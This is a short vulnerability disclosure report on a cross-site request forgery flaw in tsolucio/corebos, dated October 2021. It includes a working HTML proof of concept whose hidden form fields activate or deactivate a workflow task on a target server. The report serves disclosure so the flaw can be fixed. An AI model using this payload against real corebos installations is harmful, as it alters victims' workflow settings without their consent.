Cross-Site Request Forgery (CSRF) in tsolucio/corebos
Reported on
Oct 31st 2021
Description
Hey corebos team, in the meanwhile I find another low level CSRF.
attacker can activate/deactivate a Task of workflow with CSRF attack.
Proof of Concept
// PoC.html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://ADDRESS/corebos/index.php">
<input type="hidden" name="module" value="com_vtiger_workflow" />
<input type="hidden" name="action" value="activatedeactivateTask" />
<input type="hidden" name="workflow_id" value="37" />
<input type="hidden" name="active" value="1" />
<input type="hidden" name="return_url" value="index.php?module=com_vtiger_workflow&action=editworkflow&workflow_id=37&return_url=" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>